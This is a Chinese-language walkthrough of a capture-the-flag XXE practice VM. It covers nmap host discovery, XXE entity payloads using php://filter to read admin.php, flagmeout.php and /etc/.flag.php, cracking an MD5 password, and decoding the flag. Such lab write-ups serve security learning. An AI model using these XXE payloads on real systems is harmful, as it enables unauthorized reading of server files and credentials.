1. 导入靶机
解压XXE靶机压缩包。找到ovf格式的文件,双击使用VMware打开,确定靶机名和存放位置,进行导入靶机。
注意:网卡模式选择NAT便使用kali扫描主机ip。
2. kali的nmap扫描 同C段的主机 确定靶机ip
先确定kali的ip
nmap 192.168.182.1/24 扫描同段主句
筛选出靶机IP为:192.168.182.152。
3. 浏览器访问ip
4. 尝试访问robots.txt文件
输入:ip/robots.txt
对两个文件访问:admin.php未发现,而xxe可以看到网页。
5. 任意输入用户名密码,BurpSuite捕包
图中显示 admin 是输入的username ,确认为回显点。
6. 构建xxe攻击
图中出现<?xml?>,可构建xxe攻击
输入:
<!DOCTYPE root [<!ENTITY test SYSTEM "php://filter//convert.base64-encode/resource=admin.php">]>
在username处引用:&test;
点击发送,在username显示点,显示编码后的内容。
7. 使用base64进行解码
解码前:
解码后:
8.寻找关键信息:用户名和密码
对密码进行md5解码
密码:e6e061838856bf47e1de730719fb2609
md5解码器地址:md5在线解密破解,md5解密加密
md5解码:admin@123
9.返回登录界面,尝试登录
访问:http://ip/xxe/admin.php
账户:administhebest
密码:admin@123
10.点击flag,得到新的页面,但无法访问
新页面:flagmeout.php
11.再次访问http://ip/xxe/,抓包
利用xxe漏洞查看 flagmeout.php内容
输入:
<!DOCTYPE root[<!ENTITY test SYSTEM "php://filter/convert.base64-encode/resource=flagmeout.php">]>
在username处引用:&test;
点击发送,在username回显点,查看编码的内容
12. 对flagmeout.php文件base64编码的内容解码
编码内容:
PD9waHAKJGZsYWcgPSAiPCEtLSB0aGUgZmxhZyBpbiAoSlFaRk1NQ1pQRTRIS1dUTlBCVUZVNkpWTzVRVVFRSjUpIC0tPiI7CmVjaG8gJGZsYWc7Cj8+Cg==
解码后:
<?php
$flag = "<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->";
echo $flag;
?>
13. 对flag的内容解码
$flag = "<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->";
尝试Base64解码
单次解码不行,尝试多次解码,先base32、再base64
base32解码:L2V0Yy8uZmxhZy5waHA=
base64再解码:/etc/.flag.php
14. 再次访问 http://ip/xxe,抓包
利用xxe漏洞查看文件:/etc/.flag.php/内容
<!DOCTYPE root[<!ENTITY test SYSTEM "php://filter/convert.base64-encode/resource=/etc/.flag.php">]>
引用:&test;
15. 对回显点的/etc/.flag.php文件内容进行base64解码
16.将内容保存为网站根目录下的1.php文件
添加<?php ?>
打开小皮Aphche 2.4.39,浏览器访问:127.0.0.1/1.php 。即网站根目录下的1.php
注意:此处如果无结果,则可以修改PHP版本为5.4.45nts,即可。答案就在Catchable fatal error报错中的code处。例如:xxx{xxxxxx}
本次案例靶机的flag为:SAFCSP{xxe_is_so_easy}
XXE靶机通关结束,希望可以帮助有需要的各位朋友哦。。。
拜拜 --------2025/3/10 23:12
